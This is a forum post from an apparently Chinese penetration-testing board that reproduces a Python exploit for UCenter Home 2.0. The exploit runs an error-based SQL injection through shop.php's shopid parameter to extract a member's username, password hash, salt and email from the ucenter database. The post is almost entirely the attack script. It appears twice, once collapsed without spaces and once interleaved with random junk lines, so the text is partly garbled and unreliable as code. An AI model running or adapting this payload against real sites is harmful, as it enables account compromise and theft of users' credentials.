中国网络渗透测试联盟
标题:
UCenter Home 2.0 EXP
[打印本页]
作者:
admin
时间:
2013-1-23 09:18
标题:
UCenter Home 2.0 EXP
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:
http://www.exploit-db.com/exploits/14997/'
print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
I7 S0 Q/ ~; W9 R6 P2 U
, b; `" K `4 |% p5 u
6 s( s3 [8 { h) E3 _
#!/usr/bin/env python
- j& x `) H/ M1 e5 u
/ ~7 V6 u) z& s1 {4 L
import sys
" l8 _. G# ?, a+ c0 a$ y' k: o5 m
import urllib2
, g3 N. a5 e* U# J) G7 c
import re
$ j1 M; ?. l. e6 c4 C% w
, o( J; Q' ?5 Z
def info():
$ b# ]- p* p3 z. G& M
print 'From:
http://www.exploit-db.com/exploits/14997/'
* e& M9 J+ q* }3 N2 ]
print 'http://www.hake.cc/Web_loudong/'
+ M# r8 y- I: Y q X
print 'changed:qiaoy'
# T( y/ }; {( L. `2 o1 I/ U1 r/ f% l
print 'exp:'
y5 @! t) i- K( x* W' [6 V8 r7 N) z
print ' ./UCenter_Home_2.0.py site'
% U+ j$ i9 B+ H1 f( j
) q$ b) d7 u3 R% O6 Z% c
def main():
3 ?7 r4 M7 ^3 {& h
if len(sys.argv) != 2:
& z# \/ H3 [7 F1 T. j
info()
0 H2 Y& r# P$ d' j; q
else:
1 W: `" r; H$ L
site = sys.argv[1]
* S8 K- E+ b& d& A( ?3 |1 E
if site[0:7] == 'http://':
3 c+ z$ H& s1 ]; ~% R
sitesite =site
6 U |4 a* Q$ g" H# U
elif site[0:8] == 'https://':
) x/ i3 j2 u: a
sitesite = site
$ N. ^) C# A: y
else:
8 g! n0 f* ]8 y4 [* e; T
site = 'http://'+site
2 i" K/ ?& W- t$ u; Y) H3 o
try:
+ B1 U4 P3 W. N3 i( N! V
url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'
! ?, v7 m3 C$ V' s8 b
Value = urllib2.urlopen(url).read()
) E2 H* i0 x/ J5 k+ h1 Q
Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]
# y4 Q9 |% m; P2 x, Z) M
hacked = Msg.split(':')
9 f3 H- a; Q$ S% \' o7 Z" R, M
print 'Name: '+hacked[1]
1 o2 c1 b4 z8 c9 W: q. I- H" n V6 V" x
print 'Passwd: '+hacked[2]
& m/ W- x2 x6 R Z% J
print 'salt: '+hacked[3]
1 F+ g6 b7 n" L
print 'email: '+hacked[4]
, ^* E3 Y9 S* h! Y- B
except:
u8 s1 |& E' Q4 P6 E. _2 e
print 'Sorry,I can\'t work............'
2 z+ ^9 L, T0 t( D: p$ `
8 H5 ?, ?4 o0 B: D* y' ~) y0 N
if __name__ == '__main__':
+ @' O3 m7 p$ N
main()
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2